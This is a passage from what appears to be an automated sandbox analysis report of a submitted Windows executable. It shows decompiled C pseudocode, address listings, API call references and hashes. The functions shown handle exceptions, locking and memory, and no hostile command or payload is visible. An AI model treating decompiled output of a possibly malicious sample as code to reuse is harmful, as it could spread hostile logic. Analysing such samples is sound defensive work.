                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				L9:
                                                                                                                                                                                                                                                                                                        				_t88 = 0;
                                                                                                                                                                                                                                                                                                        				if(_t129 == 0 && _t125 != 0) {
                                                                                                                                                                                                                                                                                                        					_t116 = _t147 - 0x13c;
                                                                                                                                                                                                                                                                                                        					 *(_t147 - 0x3c) = 0;
                                                                                                                                                                                                                                                                                                        					 *((char*)(_t147 - 0x38)) = 0;
                                                                                                                                                                                                                                                                                                        					 *(_t147 - 0x2c) = 0;
                                                                                                                                                                                                                                                                                                        					 *((intOrPtr*)(_t147 - 0x34)) =  *((intOrPtr*)(_t147 - 0x17c));
                                                                                                                                                                                                                                                                                                        					 *(_t147 - 0x28) = 0;
                                                                                                                                                                                                                                                                                                        					 *(_t147 - 0x20) = 0;
                                                                                                                                                                                                                                                                                                        					 *(_t147 - 0x1c) = 0;
                                                                                                                                                                                                                                                                                                        					 *(_t147 - 0x30) =  *(_t147 - 0x180);
                                                                                                                                                                                                                                                                                                        					 *(_t147 - 0x24) = 0;
                                                                                                                                                                                                                                                                                                        					E004079F0(_t116, _t125, 0x11);
                                                                                                                                                                                                                                                                                                        					_t93 =  *(_t147 - 0x3c);
                                                                                                                                                                                                                                                                                                        					 *_t151 = _t116;
                                                                                                                                                                                                                                                                                                        					 *((char*)(_t147 + _t93 - 0x13c)) = 0;
                                                                                                                                                                                                                                                                                                        					_t151[2] =  *(_t147 - 0x30);
                                                                                                                                                                                                                                                                                                        					_t151[1] = _t93;
                                                                                                                                                                                                                                                                                                        					 *((intOrPtr*)(_t147 - 0x34))();
                                                                                                                                                                                                                                                                                                        					_t88 = 0 |  *(_t147 - 0x24) == 0x00000000;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				return _t88;
                                                                                                                                                                                                                                                                                                        				goto L25;
                                                                                                                                                                                                                                                                                                        			}

























                                                                                                                                                                                                                                                                                                        0x0040c5c0
                                                                                                                                                                                                                                                                                                        0x0040c5c3
                                                                                                                                                                                                                                                                                                        0x0040c5c9
                                                                                                                                                                                                                                                                                                        0x0040c5ce
                                                                                                                                                                                                                                                                                                        0x0040c5d4
                                                                                                                                                                                                                                                                                                        0x0040c5de
                                                                                                                                                                                                                                                                                                        0x0040c5e4
                                                                                                                                                                                                                                                                                                        0x0040c5ee
                                                                                                                                                                                                                                                                                                        0x0040c5f8
                                                                                                                                                                                                                                                                                                        0x0040c5fd
                                                                                                                                                                                                                                                                                                        0x0040c606
                                                                                                                                                                                                                                                                                                        0x0040c619
                                                                                                                                                                                                                                                                                                        0x0040c61f
                                                                                                                                                                                                                                                                                                        0x0040c629
                                                                                                                                                                                                                                                                                                        0x0040c633
                                                                                                                                                                                                                                                                                                        0x0040c642
                                                                                                                                                                                                                                                                                                        0x0040c652
                                                                                                                                                                                                                                                                                                        0x0040c657
                                                                                                                                                                                                                                                                                                        0x0040c65d
                                                                                                                                                                                                                                                                                                        0x0040c65f
                                                                                                                                                                                                                                                                                                        0x0040c666
                                                                                                                                                                                                                                                                                                        0x0040c66c
                                                                                                                                                                                                                                                                                                        0x0040c672
                                                                                                                                                                                                                                                                                                        0x0040c725
                                                                                                                                                                                                                                                                                                        0x0040c72a
                                                                                                                                                                                                                                                                                                        0x0040c7f0
                                                                                                                                                                                                                                                                                                        0x0040c7f7
                                                                                                                                                                                                                                                                                                        0x0040c800
                                                                                                                                                                                                                                                                                                        0x0040c80e
                                                                                                                                                                                                                                                                                                        0x0040c814
                                                                                                                                                                                                                                                                                                        0x0040c828
                                                                                                                                                                                                                                                                                                        0x0040c82a
                                                                                                                                                                                                                                                                                                        0x0040c84b
                                                                                                                                                                                                                                                                                                        0x0040c84b
                                                                                                                                                                                                                                                                                                        0x0040c851
                                                                                                                                                                                                                                                                                                        0x0040c857
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040c85d
                                                                                                                                                                                                                                                                                                        0x0040c861
                                                                                                                                                                                                                                                                                                        0x0040c867
                                                                                                                                                                                                                                                                                                        0x0040c849
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040c874
                                                                                                                                                                                                                                                                                                        0x0040c874
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040c874
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040c867
                                                                                                                                                                                                                                                                                                        0x0040c82c
                                                                                                                                                                                                                                                                                                        0x0040c832
                                                                                                                                                                                                                                                                                                        0x0040c832
                                                                                                                                                                                                                                                                                                        0x0040c82a
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040c800
                                                                                                                                                                                                                                                                                                        0x0040c678
                                                                                                                                                                                                                                                                                                        0x0040c678
                                                                                                                                                                                                                                                                                                        0x0040c7cb
                                                                                                                                                                                                                                                                                                        0x0040c7d3
                                                                                                                                                                                                                                                                                                        0x0040c687
                                                                                                                                                                                                                                                                                                        0x0040c68b
                                                                                                                                                                                                                                                                                                        0x0040c68e
                                                                                                                                                                                                                                                                                                        0x0040c694
                                                                                                                                                                                                                                                                                                        0x0040c6a0
                                                                                                                                                                                                                                                                                                        0x0040c6a3
                                                                                                                                                                                                                                                                                                        0x0040c6b9
                                                                                                                                                                                                                                                                                                        0x0040c880
                                                                                                                                                                                                                                                                                                        0x0040c885
                                                                                                                                                                                                                                                                                                        0x0040c88b
                                                                                                                                                                                                                                                                                                        0x0040c898
                                                                                                                                                                                                                                                                                                        0x0040c898
                                                                                                                                                                                                                                                                                                        0x0040c6c8
                                                                                                                                                                                                                                                                                                        0x0040c6cf
                                                                                                                                                                                                                                                                                                        0x0040c6d4
                                                                                                                                                                                                                                                                                                        0x0040c6da
                                                                                                                                                                                                                                                                                                        0x0040c6dd
                                                                                                                                                                                                                                                                                                        0x0040c6e3
                                                                                                                                                                                                                                                                                                        0x0040c6e8
                                                                                                                                                                                                                                                                                                        0x0040c6ee
                                                                                                                                                                                                                                                                                                        0x0040c6f0
                                                                                                                                                                                                                                                                                                        0x0040c6f6
                                                                                                                                                                                                                                                                                                        0x0040c6f6
                                                                                                                                                                                                                                                                                                        0x0040c678
                                                                                                                                                                                                                                                                                                        0x0040c730
                                                                                                                                                                                                                                                                                                        0x0040c730
                                                                                                                                                                                                                                                                                                        0x0040c734
                                                                                                                                                                                                                                                                                                        0x0040c740
                                                                                                                                                                                                                                                                                                        0x0040c74b
                                                                                                                                                                                                                                                                                                        0x0040c752
                                                                                                                                                                                                                                                                                                        0x0040c756
                                                                                                                                                                                                                                                                                                        0x0040c75d
                                                                                                                                                                                                                                                                                                        0x0040c766
                                                                                                                                                                                                                                                                                                        0x0040c76d
                                                                                                                                                                                                                                                                                                        0x0040c774
                                                                                                                                                                                                                                                                                                        0x0040c77b
                                                                                                                                                                                                                                                                                                        0x0040c780
                                                                                                                                                                                                                                                                                                        0x0040c787
                                                                                                                                                                                                                                                                                                        0x0040c78c
                                                                                                                                                                                                                                                                                                        0x0040c792
                                                                                                                                                                                                                                                                                                        0x0040c795
                                                                                                                                                                                                                                                                                                        0x0040c79d
                                                                                                                                                                                                                                                                                                        0x0040c7a1
                                                                                                                                                                                                                                                                                                        0x0040c7a5
                                                                                                                                                                                                                                                                                                        0x0040c7af
                                                                                                                                                                                                                                                                                                        0x0040c7af
                                                                                                                                                                                                                                                                                                        0x0040c7b9
                                                                                                                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: strlen
                                                                                                                                                                                                                                                                                                        • String ID: Z$Z__$_
                                                                                                                                                                                                                                                                                                        • API String ID: 39653677-182788727
                                                                                                                                                                                                                                                                                                        • Opcode ID: 4fb8ad72083b6428962a0447b954abb00701ca0cc1ec574071b07b21749bc3f4
                                                                                                                                                                                                                                                                                                        • Instruction ID: dc1124b8df5cbeb599ce563203a7e1262d4f469b331ea61f697e63e652aea6c4
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4fb8ad72083b6428962a0447b954abb00701ca0cc1ec574071b07b21749bc3f4
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0151F871D052198BDB20DF69C8943DEBBF0AF85304F0481AED848BB391DB795A888F85
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00411C99
                                                                                                                                                                                                                                                                                                          • Part of subcall function 004102F0: TlsGetValue.KERNEL32 ref: 0041033E
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00414700: Sleep.KERNEL32(?,?,?,?,?,?,0040F1DD,?,?,?,004111F8), ref: 00414740
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00414700: Sleep.KERNEL32(?,?,?,?,?,?,0040F1DD,?,?,?,004111F8), ref: 00414779
                                                                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0040E202), ref: 00411CDD
                                                                                                                                                                                                                                                                                                        • realloc.MSVCRT ref: 00411D07
                                                                                                                                                                                                                                                                                                        • realloc.MSVCRT ref: 00411D1D
                                                                                                                                                                                                                                                                                                        • memset.NTDLL ref: 00411D4B
                                                                                                                                                                                                                                                                                                        • memset.NTDLL ref: 00411D69
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00414660: Sleep.KERNEL32 ref: 00414698
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Sleep$ErrorLastmemsetrealloc$Value
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2283913283-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: a69817c4bdde9f950c5501da9f17fa0e5432666f91562d08bb2e98777d429283
                                                                                                                                                                                                                                                                                                        • Instruction ID: ae9a74b205b84ac027549f7f7f86efa9fe3e638cf07f69e35c76b9f64c0e4442
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a69817c4bdde9f950c5501da9f17fa0e5432666f91562d08bb2e98777d429283
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EE31F4B4A042098FCB00EF69D484A9DBBF4FF88354F11456EE948DB311D738E981CB99
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 60%
                                                                                                                                                                                                                                                                                                        			E0040CC00(intOrPtr* _a4) {
                                                                                                                                                                                                                                                                                                        				char _v12;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v24;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t12;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t13;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t18;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t19;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t22;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_t18 = _a4;
                                                                                                                                                                                                                                                                                                        				_t12 =  *((intOrPtr*)( *_t18));
                                                                                                                                                                                                                                                                                                        				if(_t12 > 0xc0000091) {
                                                                                                                                                                                                                                                                                                        					if(_t12 == 0xc0000094) {
                                                                                                                                                                                                                                                                                                        						_t19 = 0;
                                                                                                                                                                                                                                                                                                        						L12:
                                                                                                                                                                                                                                                                                                        						_v24 = 0;
                                                                                                                                                                                                                                                                                                        						 *_t22 = 8;
                                                                                                                                                                                                                                                                                                        						L0040EEF0();
                                                                                                                                                                                                                                                                                                        						if(_t12 == 1) {
                                                                                                                                                                                                                                                                                                        							_v24 = 1;
                                                                                                                                                                                                                                                                                                        							 *_t22 = 8;
                                                                                                                                                                                                                                                                                                        							L0040EEF0();
                                                                                                                                                                                                                                                                                                        							if(_t19 != 0) {
                                                                                                                                                                                                                                                                                                        								E0040D3A0(_t12);
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							L15:
                                                                                                                                                                                                                                                                                                        							_t13 = 0xffffffff;
                                                                                                                                                                                                                                                                                                        							L16:
                                                                                                                                                                                                                                                                                                        							return _t13;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						if(_t12 == 0) {
                                                                                                                                                                                                                                                                                                        							L9:
                                                                                                                                                                                                                                                                                                        							_t13 =  *0x422064; // 0x0
                                                                                                                                                                                                                                                                                                        							if(_t13 == 0) {
                                                                                                                                                                                                                                                                                                        								goto L16;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							_a4 = _t18;
                                                                                                                                                                                                                                                                                                        							_t22 =  &_v12;
                                                                                                                                                                                                                                                                                                        							_pop(_t18);
                                                                                                                                                                                                                                                                                                        							goto __eax;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						 *_t22 = 8;
                                                                                                                                                                                                                                                                                                        						 *_t12();
                                                                                                                                                                                                                                                                                                        						goto L15;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					if(_t12 == 0xc0000096) {
                                                                                                                                                                                                                                                                                                        						L19:
                                                                                                                                                                                                                                                                                                        						_v24 = 0;
                                                                                                                                                                                                                                                                                                        						 *_t22 = 4;
                                                                                                                                                                                                                                                                                                        						L0040EEF0();
                                                                                                                                                                                                                                                                                                        						if(_t12 == 1) {
                                                                                                                                                                                                                                                                                                        							_v24 = 1;
                                                                                                                                                                                                                                                                                                        							 *_t22 = 4;
                                                                                                                                                                                                                                                                                                        							L0040EEF0();
                                                                                                                                                                                                                                                                                                        							goto L15;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						if(_t12 == 0) {
                                                                                                                                                                                                                                                                                                        							goto L9;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						 *_t22 = 4;
                                                                                                                                                                                                                                                                                                        						 *_t12();
                                                                                                                                                                                                                                                                                                        						goto L15;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					if(_t12 == 0xc0000093) {
                                                                                                                                                                                                                                                                                                        						L17:
                                                                                                                                                                                                                                                                                                        						_t19 = 1;
                                                                                                                                                                                                                                                                                                        						goto L12;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					goto L9;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				if(_t12 >= 0xc000008d) {
                                                                                                                                                                                                                                                                                                        					goto L17;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				if(_t12 != 0xc0000005) {
                                                                                                                                                                                                                                                                                                        					if(_t12 != 0xc000001d) {
                                                                                                                                                                                                                                                                                                        						goto L9;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					goto L19;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				_v24 = 0;
                                                                                                                                                                                                                                                                                                        				 *_t22 = 0xb;
                                                                                                                                                                                                                                                                                                        				L0040EEF0();
                                                                                                                                                                                                                                                                                                        				if(_t12 == 1) {
                                                                                                                                                                                                                                                                                                        					_v24 = 1;
                                                                                                                                                                                                                                                                                                        					 *_t22 = 0xb;
                                                                                                                                                                                                                                                                                                        					L0040EEF0();
                                                                                                                                                                                                                                                                                                        					goto L15;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				if(_t12 == 0) {
                                                                                                                                                                                                                                                                                                        					goto L9;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				 *_t22 = 0xb;
                                                                                                                                                                                                                                                                                                        				 *_t12();
                                                                                                                                                                                                                                                                                                        				goto L15;
                                                                                                                                                                                                                                                                                                        			}










                                                                                                                                                                                                                                                                                                        0x0040cc08
                                                                                                                                                                                                                                                                                                        0x0040cc0d
                                                                                                                                                                                                                                                                                                        0x0040cc14
                                                                                                                                                                                                                                                                                                        0x0040cc5d
                                                                                                                                                                                                                                                                                                        0x0040cc81
                                                                                                                                                                                                                                                                                                        0x0040cc83
                                                                                                                                                                                                                                                                                                        0x0040cc83
                                                                                                                                                                                                                                                                                                        0x0040cc8b
                                                                                                                                                                                                                                                                                                        0x0040cc92
                                                                                                                                                                                                                                                                                                        0x0040cc9a
                                                                                                                                                                                                                                                                                                        0x0040cd26
                                                                                                                                                                                                                                                                                                        0x0040cd2e
                                                                                                                                                                                                                                                                                                        0x0040cd35
                                                                                                                                                                                                                                                                                                        0x0040cd3c
                                                                                                                                                                                                                                                                                                        0x0040cd42
                                                                                                                                                                                                                                                                                                        0x0040cd42
                                                                                                                                                                                                                                                                                                        0x0040ccad
                                                                                                                                                                                                                                                                                                        0x0040ccad
                                                                                                                                                                                                                                                                                                        0x0040ccb2
                                                                                                                                                                                                                                                                                                        0x0040ccb8
                                                                                                                                                                                                                                                                                                        0x0040ccb8
                                                                                                                                                                                                                                                                                                        0x0040cca2
                                                                                                                                                                                                                                                                                                        0x0040cc6d
                                                                                                                                                                                                                                                                                                        0x0040cc6d
                                                                                                                                                                                                                                                                                                        0x0040cc74
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040cc76
                                                                                                                                                                                                                                                                                                        0x0040cc79
                                                                                                                                                                                                                                                                                                        0x0040cc7c
                                                                                                                                                                                                                                                                                                        0x0040cc7f
                                                                                                                                                                                                                                                                                                        0x0040cc7f
                                                                                                                                                                                                                                                                                                        0x0040cca4
                                                                                                                                                                                                                                                                                                        0x0040ccab
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040ccab
                                                                                                                                                                                                                                                                                                        0x0040cc64
                                                                                                                                                                                                                                                                                                        0x0040ccce
                                                                                                                                                                                                                                                                                                        0x0040ccce
                                                                                                                                                                                                                                                                                                        0x0040ccd6
                                                                                                                                                                                                                                                                                                        0x0040ccdd
                                                                                                                                                                                                                                                                                                        0x0040cce5
                                                                                                                                                                                                                                                                                                        0x0040cd10
                                                                                                                                                                                                                                                                                                        0x0040cd18
                                                                                                                                                                                                                                                                                                        0x0040cd1f
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040cd1f
                                                                                                                                                                                                                                                                                                        0x0040cce9
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040cceb
                                                                                                                                                                                                                                                                                                        0x0040ccf2
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040ccf2
                                                                                                                                                                                                                                                                                                        0x0040cc6b
                                                                                                                                                                                                                                                                                                        0x0040ccc0
                                                                                                                                                                                                                                                                                                        0x0040ccc0
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040ccc0
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040cc6b
                                                                                                                                                                                                                                                                                                        0x0040cc1b
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040cc26
                                                                                                                                                                                                                                                                                                        0x0040cccc
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040cccc
                                                                                                                                                                                                                                                                                                        0x0040cc2c
                                                                                                                                                                                                                                                                                                        0x0040cc34
                                                                                                                                                                                                                                                                                                        0x0040cc3b
                                                                                                                                                                                                                                                                                                        0x0040cc43
                                                                                                                                                                                                                                                                                                        0x0040ccf6
                                                                                                                                                                                                                                                                                                        0x0040ccfe
                                                                                                                                                                                                                                                                                                        0x0040cd05
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040cd05
                                                                                                                                                                                                                                                                                                        0x0040cc4b
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040cc4d
                                                                                                                                                                                                                                                                                                        0x0040cc54
                                                                                                                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: signal
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1946981877-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: d14f430031e0000c1544ae875ed3aa060c0f773e8259265079f7acada95bda59
                                                                                                                                                                                                                                                                                                        • Instruction ID: d8b5130f18038d3c219e8aaee35d86da13098021128de2a3e6af161d937793ff
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d14f430031e0000c1544ae875ed3aa060c0f773e8259265079f7acada95bda59
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 69217E7110C200CAF7206F65C5C436FB6A0AB45758F114E2BD989E73C1C77D8884979B
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,0040EF30,0040EF44,?,?,004168E7,?,?,?,?,0041586E), ref: 004165AE
                                                                                                                                                                                                                                                                                                        • InterlockedDecrement.KERNEL32 ref: 004165B9
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,0040EF30,0040EF44,?,?,004168E7), ref: 004165D3
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,0040EF30,0040EF44,?,?,004168E7), ref: 00416607
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0040EF30,0040EF44,?,?,004168E7), ref: 00416616
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CriticalSection$EnterLeave$DecrementInterlocked
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1781445796-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: cf38177f454b4d407fb6abba26056f132e72fe4696bd102978adcf22e3062811
                                                                                                                                                                                                                                                                                                        • Instruction ID: f1d07c7601fc08a455496ddd5bfcc69915974a3964eaa512498397c80aedb5d4
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cf38177f454b4d407fb6abba26056f132e72fe4696bd102978adcf22e3062811
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2621C7B5A042089FCB00EFB9E58849DBBF0EB48360F01852AEC98D7310E734E955CB96
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 20%
                                                                                                                                                                                                                                                                                                        			E00412EC0(signed int __ecx, void* __edx, void* __edi, char* _a4, signed int _a8) {
                                                                                                                                                                                                                                                                                                        				void* _v12;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v16;
